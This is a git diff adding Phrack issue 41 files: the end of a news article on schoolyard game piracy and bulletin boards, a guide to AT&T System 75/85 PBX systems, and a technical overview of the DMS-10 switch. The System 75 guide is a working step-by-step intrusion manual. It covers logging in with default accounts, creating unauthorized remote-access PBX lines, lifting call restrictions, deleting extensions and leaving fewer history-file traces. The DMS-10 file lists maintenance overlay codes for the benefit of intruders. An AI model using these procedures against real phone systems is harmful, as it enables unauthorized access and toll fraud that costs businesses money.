+budget nor the facial hair to buy Sex gives Madonna's publishers little cause
+to fear loss of sales.  Neither Secker & Warburg in London nor Time-Warner in
+New York knew of the unofficial digital edition.  But the publishers of
+computer video games have much to lose from playground transactions.
+
+Sex is not doing a roaring trade, said one schoolboy trader.  Video games, with
+price-tags of up to pounds 40, are what every child wants, but few can afford.
+But who needs to buy, when your classmates will trade copies of the latest
+titles for another game, a glimpse of Madonna or a humble pound coin?
+
+Games disks are usually uncopyable.  Skilled programmers "crack" the
+protection, as an intellectual challenge and a way of gaining respect in an
+exclusive scene, add "training" options such as extra lives, and post this
+version on a computer bulletin board -- a computer system attached to a
+telephone line where people log in to trade their "wares".
+
+Most bulletin boards (BBSs) are friendly places where computer freaks exchange
+tips, messages and "public domain" programs, made available by their authors
+free of charge.  But illegitimate operators, or SysOps, look down on "lame"
+legal boards, and "nuke" any public domain material submitted to their systems.
+
+The larger pirate boards are the headquarters of a cracking group -- often in a
+15-year-old's bedroom.  There are perhaps 100 in Britain.  Cracked games and
+"demos" publicize phone numbers, and a warning is issued that copyright
+software should not be posted --a disclaimer of questionable legality.  New
+members are asked if they represent law enforcement agencies.  According to a
+warning message on one board, at least one BBS in the United States is operated
+by the FBI.
+
+Your account at a board may not allow you to download until you upload wares of
+sufficient quality.  Games are considered old after a week, so sexy images,
+"demos" or lists of use to hackers are an alternative trading commodity.
+Available this week, as well as Madonna, are: "lamer's guide to hacking PBXs",
+"Tex" and "Grapevine" -- disk magazines for pirates; and demos -- displays of
+graphical and sound programming prowess accompanied by bragging messages,
+verbal assaults on rival factions and advertisements for BBSs.  According to a
+former police officer, the recipes for LSD and high explosives have circulated
+in the past.
+
+The board's "download ratio" determines how many disks are traded for every
+contribution -- usually two megabytes are returned for every megabyte
+contributed.  "Leech accounts" (unlimited access with no quotas) are there for
+those foolish enough to spend between pounds 1 and pounds 60 per month.  But
+children can sign on using a pseudonym, upload a "fake" -- garbage data to
+increase their credit -- then "leech" as much as possible before they get
+"nuked" from the user list.
+
+The "modem trader" is a nocturnal trawler of BBSs, downloading wares, then
+uploading to other boards.  Current modem technology allows users to transfer
+the contents of a disk in 10 minutes.  A "card supplier" can provide a stolen
+US or European phone credit card number.  The scene knows no language barriers
+or border checks, and international cross-fertilization adds diversity to the
+software in circulation.
+
+Through the unsociable insomniac trader, or the wealthier "lamer" with a paid-
+up "leech account," games reach the playground.  The traders and leeches gain
+extra pocket money by selling the disks for as little as pounds 1, and from
+there the trade begins.
+
+Some market-traders have realized the profit potential, obtaining cracked
+software through leech accounts and selling the disks on stalls.  Sold at a
+pocket-money price of pounds 1 per disk, many games reach schools.  The trading
+of copyright software is illegal but the perpetrators stand little chance of
+getting caught and are unlikely to be prosecuted.
+
+The victims, software houses, suffer real damage.  Sales of Commodore Amiga
+computers equal the dedicated games machines -- the Sega Megadrive or Nintendo,
+yet sales of Amiga games (on disk and therefore pirate fodder) often reach only
+one third of the volume of their copy-proof console cartridge counterparts.
+Despite his preference for Amiga technology, Phil Thornton of System 3 Software
+is "seriously reconsidering" future development of Amiga games. Myth, a two-
+year project, sold pitiful amounts.  Mr. Thornton was called by a pirate the
+day it was released -- the game was available on a bulletin board.  Because of
+piracy, the sequel to the successful Putty will be mastered instead for the
+Nintendo console.
+
+This tactic may not help for long.  The cracked Amiga release of Putty carried
+an advertisement (added by pirates) for a Nintendo cartridge "backup" device.
+Transferred to disk, a "pirate-proof" console game can be traded like any
+other.  Games for the Nintendo and Sega systems are available on most bulletin
+boards.
+
+Scotland Yard only takes an interest in bulletin boards bearing pornography,
+though most also carry pirate software.  Funded by the software industry, the
+Federation Against Software Theft has successfully prosecuted only one board,
+with "more pending."
+
+This Christmas parents will buy hundreds of thousands of video games.  Some
+children will ask for modems; thus games will be on the bulletin boards by
+Boxing Day, and the first day of term will see the heaviest trading of the
+year.
+
+AUTHOR'S NOTE:  I considered using a pseudonym for this article.  Two years
+                ago, a Newsweek reporter exposed the North American bulletin
+                board network.  His credit rating, social security and bank
+                files were altered in a campaign of intimidation which included
+                death threats.  Most of those responsible were 15-year-olds.
diff --git a/phrack41/6.txt b/phrack41/6.txt
new file mode 100644
index 0000000..dbc5d0a
--- /dev/null
+++ b/phrack41/6.txt
@@ -0,0 +1,404 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 6 of 13
+
+                   A Brief Guide to Definity G Series Systems
+                                     a.k.a
+                                 System 75 - 85
+
+                            Written by Scott Simpson
+
+
+          Greets to Jim Anderson, The Missing Link, Randy Hacker, Dark Druid,
+Nickodemus, Mercury, Renegade, Infinity (enjoy the army!), Weirdo, TomCat,
+GarbageHeap, Phrack Inc.
+
+
+Basic History
+~~~~~~~~~~~~~
+Definity model systems came into existent in the later part of the 1970s.  In
+1983, AT&T came out with a revised model called 75.  This system was built to
+hold more incoming lines and did not have as many errors as the earlier version
+did.  The 1983 version was replaced with a version re-written in 1986.  Today,
+the systems are referred to as G models.  System 75 is now called G1 and 85 is
+called G2.  A new model is currently available and is called the Definity G3I
+which is Generic 3 with an Intel chip, and Definity G3R which is Generic 3 with
+a Risk chip.  There are 3 different versions to each model.  Version one is the
+most common and it is an XE Single Carrier Unit.  The other two systems are 2
+carriers.  A system will usually cost somewhere around 50 to 80 thousand
+dollars.  You MIGHT come across a smaller version and it is called "Merlin
+Legend."  This system will hold about 50-100 lines.  System 75 & 85 will hold
+around 1000 lines.  System 75/85 are used by companies to house all of their
+incoming lines, as well as to send their incoming lines to destinations set up
+by the owners, whether it be Audix or any other setup.  There are many uses for
+the system besides VMBs and PBXes.  System 75/85 has three main functions that
+hackers are interested in. They are the capabilities of VMB, bridging, and of
+course PBX exchanges.
+
+
+Discovering the System
+~~~~~~~~~~~~~~~~~~~~~~
+When you find a System 75, you will make a 1200/NONE connection (if HST used),
+as most setups have a built in 1200 baud modem.  Normally, the controller
+number will not be in the same prefix as the business or the PBX and the line
+is actually owned by AT&T.  Try CNAing a System 75 line and it will tell you
+that it is owned by AT&T.  Once you find a carrier, you will need to be able to
+display ANSI or some equivalent type of terminal graphics.  Most are set to
+N81, but some may be E71.  My suggestion is to use ToneLoc which is produced by
+Mucho Maas and Minor Threat.  As you know, this program will scan for carriers
+as well as tones.  This program can be found on just about every ELEET H/P BBS.
+
+
+Getting into the System
+~~~~~~~~~~~~~~~~~~~~~~~
+Getting into the system is the easy part if you have the defaults.  You must
+find them on your own and you will find out that a lot of people are not
+willing to trade for them.  There is one default that will enable you to snoop
+around and tell whether or not they have a PBX, provided that they have not
+changed the password or restricted the account.  This one default is usually a
+fully operational account without the privileges of altering any data but I
+have come across a couple of systems where it wouldn't do anything.  Using this
+default account is a good way to start if you can find it.  It is also good to
+use any time you call and don't plan on changing anything.  All actions by this
+account are not kept in the system history file.  Now on to the good stuff!!
+
+
+Abusing System 75
+~~~~~~~~~~~~~~~~~
+After logging into a 75, there are several commands available depending on the
+default you are using.  This part will be for the basics.  I will explain more
+later for the more advanced people.
+
+When you log in, you will have the commands LIST, DISPLAY, and a couple others
+that don't matter.  These are the only ones that you will need with the
+aforementioned default.  First type "DIS REM" (display remote access).  If
+there is a PBX set up on the system, it will be shown on the extension line.
+The barrier code is the code to the PBX. If "none" appears, there is no code
+and it's just 9+1.  The extension line can either be 3 or 4 digits.  Usually,
+if it's 3 digits, it is run off of AUDIX (AUDio Information eXchange) or they
+are smart and are hiding the one digit!  Look at the dialplan and see if the
+extensions are 3 or 4 digits.  If it tells you that the extensions are three
+digits, chances are that it is somewhere in the AUDIX system.  If it's run off
+of an AUDIX, look through all of the extensions by either list or display
+'extensions' until you find one that says something like "remote extension" or
+something that looks different.  If the one digit is hidden, use ToneLoc and
+scan for the digit needed.  Next, display the trunk groups.  This will tell you
+the actual dial-up.  If you don't find it here, don't panic.  As you go through
+the trunk groups, also look at the incoming destination as well as the night
+destination.  If any of these show the remote extension here, there is your
+PBX.  If not, keep looking through all of the trunk groups.  Write down all of
+the phone numbers it gives you and try them.  They can usually be found on page
+three or so.
+
+A LOT of the time, places call forward a back line or so to the actual PBX.  If
+there is no remote access extension when you display the remote access, you are
+shit out of luck unless you have a higher default and read the rest of this
+text.
+
+
+Setting Up Your Own PBX
+~~~~~~~~~~~~~~~~~~~~~~~
+If you have a higher default, you will notice that if you type help, you have
+more commands that are available to you, such as change, download, etc.
+Remember, the company can change the privileges of the defaults so if you
+cannot see these commands, use another default.  The first thing you want to do
+is to display the dialplan.  This will tell you the amount of digits and the
+first digit of all of the sequences.  Here is an example of a dialplan.  There
+are several ways the dialplan may look.
+
+                 Number of Digits
+-------1----2----3----4----5----6----7----8----9
+--
+F 1
+I 2        Tac
+R 3
+S 4             Fac
+T 5
+  6               Extension
+D 7               Extension
+I 8        Tac
+G 9
+I 0 Attendant
+T *
+  #
+
+Using the above chart, all extensions will start with either a 6 or 7 and will
+be four digits long.  The Tac is two digits, and will start with a 2 or an 8.
+Don't worry about FAC or any others at this time.
+
+After you make note of this, type "ch rem" (change remote access), go to the
+extension line, and put in an extension.  Next, find the trunk group that you
+want to use and type "ch tru #".  Go to the line for night service and put the
+extension in there.  If there is already an extension for night service on all
+of the trunks, don't worry. If not, add it, and then save it.  If it says
+invalid extension, you misread the dialplan.  If you pick an extension already
+in use, it will tell you so when you try to install it in the remote extension
+line in the remote address.  Once all of this is completed, you may go back to
+the remote access and add a code if you like, or you may just enter "none" and
+that will be accepted.  THE NEXT PART IS VERY IMPORTANT!  Look at the trunk
+that you installed and write down the COR number.  Cancel that command and type
+"dis cor #".  Make sure that the Facilities Restriction Level (FRL) at the top
+is set to 7 (7 is the least restricted level & 0 is the most) and that under
+calling party restrictions & called party restrictions, the word "none" (lower
+case) is there!  If they are not, type "ch cor #" and make the changes.  Last,
+type "dis feature".  This will display the feature access codes for the system.
+There will be a line that says something like "SMDR Access Code."  This will be
+the code that you enter after the barrier code if there is one.  I have seen
+some be like *6, etc.  Also, there will be, on page 2 I believe, something to
+the like of outside call. usually it is set to 9 but check to be sure.   That's
+about it for this segment.  All should be fine at this point.  For those that
+want a 24 hour PBX, this next section is for you.
+
+
+For those of you that are greedy, and want a 24 hour PBX, most of the steps
+above are the same.  The only difference is that you will look through all of
+the trunks until you come across one that has several incoming rotary lines in
+it.  Simply write down the port number and the phone number for future
+reference and delete it by using the "ch" command.  From the main prompt, type
+"add tru #".  For the TAC, enter a correct TAC number.  Keep going until you
+get to the COR.  Enter a valid one and remember that the FRL should be set to
+7, etc.  Keep going...the next line that is vacant and needs something is the
+incoming destination.  Set it to the remote extension that you have created.
+The next vacant line I think is type (towards the middle of the page).  Enter
+ground and it should print out "ground-start."  If there is a mistake, it will
+not save and it will send you to the line that needs to have something on it.
+After all is done, it will save.  After this segment, there is a copy of a
+trunk and what it should look like for the use of a PBX.  Next, go to page 3
+and enter the port and phone number that you wrote down earlier.  Save all of
+the changes that you have made.  This should be all you need.
+
+
+One more way!  If you scan through all of the extensions on the system, you may
+find an "open" extension.  This extension may be like the phone outside in the
+waiting room or an empty office or whatever.  This extension must be a valid
+phone number on their network or must be reachable on their AUDIX for this
+method to work. If you know how to add ports to Audix, this method will be best
+for you since setting up a trunk is not needed.  If you find something like
+this, it's usually better to use this as your 24 hour PBX rather than taking
+away a line for several reasons:  1) there are less changes that you must make
+so there will be less data saved in the history file; 2) other people that have
+legal uses for the line won't trip out when they get a dial tone; and 3) the
+company will not notice for some time that they've lost an extension that is
+hardly used!  To set it up this way, you must delete the old info on that
+extension by typing "remove extension #".  It will then show you the station in
+detail.  Save it at that point and it will be deleted.  Next go to the remote
+access and enter the extension that you deleted on the remote extension line.
+Next enter a barrier code or "none" if you don't want one.  Save it!  Doing it
+this way USUALLY does not require a new trunk to be added since the port is
+already in the system but if you run into problems, go back and add it through
+the use of a trunk.  You will still have to assign it a "cor" in the remote
+access menu, and remember to make sure that the FRL and the restrictions are
+set correctly as stated as above.
+
+
+In part 2, if there is a demand, I will tell how to make a bridge off of a 75.
+It is a lot more difficult, and requires a lot more reading of the manuals.  If
+anyone can obtain the manuals, I would strongly urge them to do so.  Also
+potentially in part 2, I will show how to create a VMB.  If they have AUDIX
+voice mail, chances are they have a 75!
+
+So happy hunting and see ya soon!
+
+If you need to get a hold of me to ask a question, you may catch me on the nets
+or on IRC.
+
+Enjoy!
+
+Scott Simpson
+
+-------------------------------------------------------------------------------
+APPENDIX A : Example of a Trunk For PBXs
+
+                              Trunk Group                    Page 1 of 5
+                              -----------
+
+Group Number #               Group Type: co                Smdr Reports: n
+
+   Group name: Whatever ya want         Cor: #            Tac: #
+
+Mis Measured? n
+
+   Dial access: y    Busy Threshold: 60      Night Service: What will answer
+                                                            after hours
+
+Queue length: 0  Abandoned call Search: n   Incoming Dest: What will answer
+                                                           any time the # is
+                                                           called unless NS
+                                                           has an extension.
+
+    Comm Type: voice       Auth Code: n     Digit Absorption List:
+
+
+      Prefix-1? n    Restriction: code    Allowed Calls List: n
+
+   Trunk-Type: Ground-start
+
+ Outgoing Dial type: tone
+
+  Trunk Termination: whatever it is        Disconnect Timing: Whatever it is
+                     to.                                      set to.
+                             ACA Assignments: n
+
+
+[Page 2 is not all that important.  It's usually used for all of the
+[maintenance to the trunk etc. so leave it all set to its default setting.]
+
+
+                                                  page 3 of 5
+       Port        Name        Mode      Type       Answer delay
+1   Port number  phone number
+2
+3
+etc.
+
+
+That's all that is needed for the trunks.
+-------------------------------------------------------------------------------
+APPENDIX B : Basic Commands and Terms
+
+     Basic Terminology
+     -----------------
+COR  - Class Of Restriction
+FRL  - Facilities Restriction Level
+SMDR - Station Message Detail Recording
+TAC  - Trunk Access Code
+FAC  - Feature Access Code
+
+
+     Basic Commands for Default Emulation (513)
+     ------------------------------------------
+Esc Ow - Cancel
+Esc [U - Next Page
+Esc SB - Save
+Esc Om - Help
+
+
+     Commands for 4410
+     -----------------
+Esc Op - Cancel
+Esc Ot - Help
+Esc Ov - Next Page
+Esc Ow - Back Page
+Esc OR - Save
+Esc Oq - Refresh
+Esc Os - Clear Fields
+
+Below is an explanation of all of the commands.
+
+The following is a captured buffer of a login to System 75.  I have captured
+the commands and have edited the buffer to include brief definitions of the
+commands.
+
+Display and list are basically the same command, but display shows more
+detailed information on the command that you select.  For example, "list tru"
+will list all of the trunk groups in the system.  "dis tru" will ask for a
+trunk number, and then display all of the information on that trunk.
+
+CH Help
+Please enter one of the following action command words:
+
+add                      duplicate                save
+change                   list                     set
+clear                    monitor                  status
+display                  remove
+
+
+Or enter 'logoff' to logoff the system
+Add       - Is pretty self-explanatory
+Change    - Is also self-explanatory
+Clear     - will clear out the segment
+Duplicate - will duplicate the process
+List      - self-explanatory
+Monitor   - used for testing, and monitoring the system
+Remove    - remove anything from the system EXCEPT the History File!  Sorry
+            guys!
+Save      - saves work done
+Set       - sets the time, etc.
+Status    - shows current status of the system
+
+List Help
+Please enter one of the following object command words:
+                      COMMANDS UNDER "LIST"
+abbreviated-dialing      groups-of-extension      personal-CO-line
+aca-parameters           hunt-group               pickup-group
+bridged-extensions       intercom-group           station
+configuration            measurements             term-ext-group
+coverage                 modem-pool               trunk-group
+data-module              performance
+
+Or press CANCEL to cancel the command
+Abbreviated-Dialing: Speed calling feature from their voice terminal
+Aca-parameters: Automatic-Circuit-Assurance
+Bridged Extensions: Used for bridging extensions together
+Configuration: Overall system Configuration
+Coverage: Call Coverage
+Data-module: Description of the data module used
+Groups Of Extensions: Lists all of the extensions available
+Hunt-Group: Checks for active or idle status of extension numbers
+Intercom-group: Lists the intercoms and their info
+Modem-Pool: Allows switched connects between data modules and analog data
+Performance: Shows the performance of the system
+Personal-CO-line: Is for dedicated trunks to or from public terminals
+Pickup-group: Pickup station setup
+Station: Will list all of the available stations assigned
+Term-ext-group: For terminating extension group
+Trunk-Group: Lists ALL of the trunks; will NOT show all details like Display
+
+Dis Help
+Please enter one of the following object command words:
+                    Commands Under 'Display'
+abbreviated-dialing      data-module              personal-CO-line
+alarms                   dialplan                 pickup-group
+allowed-calls            digit-absorption         port
+announcements            ds1                      psc
+attendant                errors                   remote-access
+button-location-aca      feature-access-codes     route-pattern
+circuit-packs            hunt-group               station
+code-restriction         intercom-group           synchronization
+communication-interface  ixc-codes                system-parameters
+console-parameters       listed-directory-numbers term-ext-group
+cor                      modem-pool               time
+cos                      paging                   trunk-group
+coverage                 permissions
+
+
+Or press CANCEL to cancel the command
+Abbreviated Dialing: Covered above, but shows more information
+Alarms: Will show information on the alarms (which ones are on/off)
+Allowed-Calls: Will show LD carrier codes and allowed call list
+Announcements:
+Attendant: Allows attendant to access trunks without voice terminals
+Button-location-aca: Will show the location of the aca selected
+circuit-packs: Tells types of lines used.
+Code-Restriction: Shows restrictions for HNPA and FNPA
+Communication-Interface: Information on the communication interface
+Console-Parameters: Will list the parameters of the console, etc.
+Cor: Class Of Restriction (will show the cor for the # entered)
+Cos: Class Of Service
+Coverage: Shows the coverage of the system (voice terminals, etc.)
+Data-Module: Will show information for the data channels entered
+Dialplan: List the current config for extensions etc.
+Digit-absorption:
+Ds1: Used for tie-trunk services
+Errors: Shows all of the errors on the system
+Feature-Access_Codes: Lists all of the feature access codes for all of the
+                      features on the entire system
+Hunt-Group: As above, but will tell more information for the # you enter
+Intercom Group: Lists all of the names and their intercom assignments
+IXC-Codes: Inter-eXchange Carrier codes
+Listed-Directory: Lists the numbers in the directory of the system
+Modem-Pool: Will show info on the channel you select (exp baud, parity, etc.)
+Paging: Used for the paging stations on the voice terminals
+Permissions: Will show the privileges of the other accounts/defaults
+Personal-CO-Line: As above but more descriptive
+Pickup-Group: Shows names and extensions in the specified group number
+Port: Will show the info on the port you ask about
+PSC: Keeps a call between to data points connected while the system is active
+Remote-Access: Will show the Remote Access that is there (if any)
+Route-Pattern: The pattern of routing within the voice terminals, etc.
+Station: Will show detailed information on the station # you enter
+Synchronization: Will show the location of the DS1 packs
+System-Parameters: List of all of the available systems parameters
+Term-Ext-Group: As above but more descriptive
+Time: Will show the current time and date
+Trunk-Group: Will show all available information for the trunk you select
diff --git a/phrack41/7.txt b/phrack41/7.txt
new file mode 100644
index 0000000..d98b2d2
--- /dev/null
+++ b/phrack41/7.txt
@@ -0,0 +1,542 @@
+                                ==Phrack Inc.==
+
+                   Volume Four, Issue Forty-One, File 7 of 13
+
+                          How To Build A DMS-10 Switch
+
+                                by The Cavalier
+                     Society for the Freedom of Information
+
+                                 March 11, 1992
+
+
+     With the telephone network's complexity growing exponentially as the
+decades roll by, it is more important than ever for the telecom enthusiast to
+understand the capabilities and function of a typical Central Office (CO)
+switch.  This text file (condensed from several hundred pages of Northern
+Telecom documentation) describes the features and workings of the Digital
+Multiplex Switch (DMS)-10 digital network switch, and with more than an average
+amount of imagination, you could possibly build your own.
+
+     The DMS-10 switch is the "little brother" of the DMS-100 switch, and the
+main difference between the two is the line capacity.  The DMS line is in
+direct competition to AT&T's ESS line (for the experienced folks, the features
+covered are the as those included in the NT Software Generic Release 405.20 for
+the 400 Series DMS-10 switch).
+
+
+ Table of Contents
+ ~~~~~~~~~~~~~~~~~
+I.   OVERVIEW/CPU HARDWARE SPECS
+II.  NETWORK SPECS
+     1. Network Hardware
+     2. Network Software
+     3. Advanced Network Services
+III. EXTERNAL EQUIPMENT SPECS
+     1. Billing Hardware
+     2. Recorded Announcement Units
+     3. Other Misc. Hardware
+IV.  MAINTENANCE AND ADMINISTRATION
+     1. OAM
+     2. Interactive Overlay Software Guide
+V.   SPEC SHEET
+VI.  LIMITED GLOSSARY
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+I. OVERVIEW/CPU HARDWARE SPECS
+
+Overview
+
+     The DMS-10 switch is capable of handling up to 10,800 lines, and was
+designed for suburban business centers, office parks, and rural areas.  It can
+be installed into a cluster configuration to centralize maintenance and
+administration procedures and to increase combined line capacity to 50,000
+lines.  It is capable of functioning as an End Office (EO), an Equal Access End
+Office (EAEO), and an Access Tandem (AT), and is a known as a Class 5 switch.
+It supports up to 3,408 trunks and 16,000 directory numbers.  It can outpulse
+in DP (Dial Pulse), MF (Multi-Frequency), or DTMF (Dual-Tone Multi-Frequency),
+insuring compatibility with new and old switches alike (translation -- the
+switch is small, by most standards, but it has massive bounce for the ounce).
+
+
+Hardware Specifications
+
+     The DMS-10 switch itself is a 680x0-based computer with 1 MB of RAM in its
+default configuration.  The processor and memory are both duplicated; the
+backup processor remains in warm standby.  The memory system is known as the
+n+1 system, meaning that the memory is totally duplicated.
+
+
+II. NETWORK SPECS
+
+Network Hardware
+
+     The DMS-10 network hardware consists mostly of PEs, or Peripheral
+Equipment trunk and line packs.  The PEs take the incoming analog voice
+signals, digitalize them into 8 bit PCM (Pulse Code Modulation) signals, and
+feed it into the main transmission matrix section of the switch.  There, it is
+routed to another trunk or line and converted back into an analog signal for
+retransmission over the other side of the call.  Note that manipulating voice
+in the digital domain allows the signal to be rerouted, monitored, or
+retransmitted across the country without any reduction in signal quality as
+long as the signals remain in PCM format.  <Hint!>
+
+
+Network Software
+
+     The DMS-10 has a variety of software available to meet many customers'
+switching needs.  A good example of this software is the ability of several
+DMS-10 switches to be set up in a cluster (or star configuration, for those of
+you familiar with network topologies).  In this arrangement, one DMS-10 is set
+up as the HSO (Host Switching Office) and up to 16 DMS-10s are set up as SSOs
+(Satellite Switching Offices), allowing all billing, maintenance, and
+administration to be handled from the HSO.  Additionally, all satellites can
+function on their own if disconnected from the HSO.
+
+     Another feature of the DMS-10's network software are nailed-up
+connections, commonly known as loops.  The DMS-10 supports up to 48 loops
+between any two points.  The connections are constantly monitored by the switch
+computer, and if any are interrupted, they are re-established.
+
+     Meridian Digital Centrex (MDC) is the name given to a group of features
+that enable businesses to enjoy the benefits of having PBX (Private Branch
+Exchange) equipment by simply making a phone call to the local telco.
+
+
+Advanced Network Services (ANS)
+
+     If the DMS-10 is upgraded with the 400E 32-bit RISC processor, the switch
+will be able to handle 12,000 lines, enjoy a speed improvement of 80%, support
+a six-fold increase in memory capacity, and, perhaps most importantly, will be
+able to run NT's Advanced Network Services software.  This software includes
+Common Channel Signaling 7 (CCS7), Advanced Meridian Digital Centrex, DMS
+SuperNode connectivity, and ISDN.  CCS7 is the interswitch signaling protocol
+for Signaling System 7, and the concept deserves another text file entirely
+(see the New Fone eXpress/NFX articles on SS7).
+
+
+III. EXTERNAL EQUIPMENT SPECS
+
+Billing Format Specifications
+
+     The DMS-10 can record AMA (Automatic Message Accounting) billing data in
+either Bellcore or Northern Telecom format, and it can save this data in one of
+several ways:
+
+     - by saving onto a 9-track 800 BPI (Bits-Per-Inch) density tape drive
+       called an MTU (Magnetic Tape Unit)
+
+     - by saving onto a IOI (Input/Output Interface) pack with a 64 MB SCSI
+       (Small Computer System Interface) hard drive, and transferring to 1600
+       BPI tape drives for periodic transport to the RAO (Regional Accounting
+       Office)
+
+     - by transmitting the data through dial-up or dedicated telephone lines
+       with the Cook BMC (Billing Media Converter) II, a hard drive system that
+       will transmit the billing records on request directly to the RAO.  The
+       Cook BMC II supports six different types of transmission formats, listed
+       below:
+
+        * AMATS (BOC)                           [max speed: 9600 bps]
+            Call records are stored using the Bellcore AMA format and polled
+            using the BX.25 protocol.  Two polling ports are provided with one
+            functioning as a backup.
+
+        * BIP Compatible                        [max speed: 9600 bps (2400*4)]
+            Call records are stored using the Bellcore AMA format and polled
+            using the HDLC Lap B protocol.  Four polling ports are provided
+            that can function simultaneously for a combined throughput of 9600
+            bps. This specification is compatible with GTE's Billing
+            Intermediate Processor.
+
+        * Bellcore AMA w/ BiSync polling        [max speed: 9600 bps]
+            Call records are stored using the Bellcore AMA format and polled
+            using the IBM BiSync 3780 protocol.  One polling port is provided.
+            This option is intended for operating companies who use independent
+            data centers or public domain protocols for data processing.
+
+        * Bellcore AMA w/ HDLC polling          [max speed: 9600 bps]
+            Call records are stored using the Bellcore AMA format and polled
+            using the HDLC (High-level Data Link Control) protocol.  One port
+            is provided.
+
+        * NT AMA w/ HDLC polling                [max speed: 9600 bps]
+            Call records are stored using the Northern Telecom AMA format and
+            polled using the HDLC protocol.
+
+        * NT AMA w/ BiSync polling              [max speed: 4800 bps]
+            Call records are stored using the Northern Telecom AMA format and
+            polled using the BiSync protocol.
+
+     - by interfacing with AT&T's AMATS (Automatic Message Accounting
+       Teleprocessing System)
+
+     - by interfacing with the Telesciences PDU-20
+
+     All of the above storage-based systems are fully fault-tolerant, and the
+polled systems can store already-polled data for re-polling.
+
+
+Recorded Announcement Units
+
+     The DMS-10 system may be interfaced to one or more recorded announcement
+units through two-wire E&M trunks.  Some units supported include the Northern
+Telecom integrated Digital Recorded Announcement Printed Circuit Pack (DRA
+PCP), the Cook Digital Announcer or the Audichron IIS System 2E.
+
+     The DRA PCP is integrated with the DMS-10 system, as opposed to the Cook
+and Audichron units, which are external to the switch itself.  It provides
+recorded announcements on a plug-in basis and offers the following features:
+
+     - Four ports for subscriber access to announcements
+     - Immediate connection when pack is idle
+     - Ringback tone when busy until a port is free
+     - Switch-selectable message lengths (up to 16 seconds)
+     - Local and remote access available for message recording
+     - Memory can be optionally battery-backed in case of power loss
+     - No MDF (Main Distribution Frame) wiring required
+
+Other External Hardware
+
+     The DMS-10 can also support the Tellabs 292 Emergency Reporting System,
+the NT Model 3703 Local Test Cabinet, and the NT FMT-150 fiber optic
+transmission system.  More on this stuff later, perhaps.
+
+
+IV. MAINTENANCE AND ADMINISTRATION
+
+OAM
+---
+     OAM, or Operations, Administration, and Maintenance functions, are
+performed through an on-site maintenance terminal or through a remote
+maintenance dial-in connection.  The DMS-10 communicates at speeds ranging from
+110 to 9600 baud through the RS-232C port (standard) in ASCII.  There can be up
+to 16 connections or terminals for maintenance, and security classes may be
+assigned to different terminals, so that the terminal can only access the
+programs that are necessary for that person's job.  The terminals are also
+password protected, and bad password attempts result in denied access, user
+castration and the detonation of three megatons of on-site TNT.  <Just kidding>
+
+     The software model for the DMS-10 consists of a core program which loads
+overlays for separate management functions.  These overlays can be one of two
+types:  either free-running, which are roughly analogous to daemons on Unix
+environments, which are scheduled automatically; or interactive, which
+communicate directly with the terminal user.
+
+     The major free-running programs are the Control Equipment Diagnostic
+(CED), the Network Equipment Diagnostic (NED), the Peripheral Equipment
+Diagnostic (PED), and the Digital Equipment Diagnostic (DED).  The CED runs
+once every 24 hours, and tests the equipment associated with the CPU buses and
+the backup CPU.  The NED runs whenever it feels like it and scans for faults in
+the network and proceeds to deal with them, usually by switching to backup
+hardware and initiating alarm sequences.  The PED is scheduled when the switch
+is installed to run whenever the telco wants it to, and it systematically tests
+every single trunk and line connected to that central office (CO).  The DED
+tests the incoming line equipment that converts analog voice to digital PCM.
+
+     Now, for interactive programs (a.k.a. interactive overlays), I'm going to
+list all of their codes, just in case one of you gets lucky out there.  To
+switch to an overlay, type OVLY <overlay>.  To switch to a sub-overlay, type
+CHG <sub-overlay>.  Keep in mind that NT has also installed help systems on
+some of their software, accessible by pressing "?" at prompts.  Here we go:
+
+Overlay     Explanation and Prompting Sequences
+-------     -----------------------------------
+ALRM        Alarms
+
+            ALPT - Alarm scan points
+            SDPT - Signal distribution points
+
+AMA         Automatic Message Accounting
+
+            AMA  - Automatic Message Accounting
+            MRTI - Message-rate treatment index
+            PULS - Message-rate pulsing table
+            TARE - Tariff table
+
+AREA        Area
+
+            CO   - Central Office Code
+            HNPA - Home Numbering Plan Area
+            RC   - Rate Center
+            RTP  - Rate Treatment Package
+
+CLI         Calling Line Identification
+
+CNFG        Configuration Record
+
+            ALRM - Alarm System Parameters
+            AMA  - Automatic Message Accounting parameters
+            BUFF - System Buffers
+            CCS  - Custom Calling Services
+            CCS7 - Common Channel Signaling No. 7
+            CDIG - Circle Digit Translation
+            CE   - Common Equipment Data
+            CLUS - Cluster data
+            COTM - Central Office overload call timing
+            CP   - Call processing parameters
+            CROT - Centralized Automatic Reporting of Trunks
+            CRTM - Central Office regular call processing timing
+            CSUS - Centralized Automatic Message Accounting suspension
+            DLC  - Data Link Controller assignment for clusters
+            E800 - Enhanced 800 Service
+            FEAT - Features
+            GCON - Generic Conditions
+            HMCL - Host message class assignment
+            IOI  - Secondary input/output interface pack(s)
+            IOSF - Input/Output Shelf Assignment
+            LCDR - Local Call Detail Recording
+            LIT  - Line Insulation Testing parameters
+            LOGU - Logical Units Assignments
+            MOVE - Move Remote Line Concentrating Module
+            MTCE - Maintenance Parameters
+            MTU  - Magnetic Tape Unit Parameters
+            OPSM - Operational Measurements
+            OVLY - Overlay scheduling
+            PSWD - Password Access
+            SITE - Site assignments
+            SSO  - Satellite Switching Office Assignments
+            SUB  - Sub Switch
+            SYS  - System parameters
+            TRB  - Periodic trouble status reporting
+            VERS - Version
+
+CPK         Circuit Pack
+
+            ACT  - AC Testing Definition
+            DCM  - Digital Carrier Module
+            LPK  - Line Concentrating Equipment line packs
+            PACK - Peripheral Equipment packs
+            PMS  - Peripheral Maintenance System pack
+            PSHF - Peripheral Equipment Shelf
+            RMM  - Remote Maintenance Module
+            RMPK - Remote shelf
+            RSHF - Remote Concentration Line Shelf
+            SBLN - Standby line
+            SLC  - SLC-96
+            SLPK - SLC-96 pack
+
+DN          Directory Number
+
+            ACDN - Access Directory Number
+            CRST - Specific Carrier Restricted
+            ICP  - Intercept
+            RCFA - Remote Call Forwarding appearance
+            ROTL - Remote Office Test Line
+            STN  - Station Definition
+
+EQA         Equal Access
+
+            CARR - Carrier Data Items
+            CC   - Country Codes
+
+HUNT        Hunting
+
+            DNH  - Directory Number Hunting
+            EBS  - Enhanced Business Services hunting
+            KEY  - Stop hunt or random make busy hunting
+
+LAN         Local Area Network
+
+            LAC  - LAN Application Controller
+            LCI  - LAN CPU Interface
+            LSHF - Message LAN Shelf
+
+NET         Network
+
+            D1PK - DS-1 interface pack (SCM-10S)
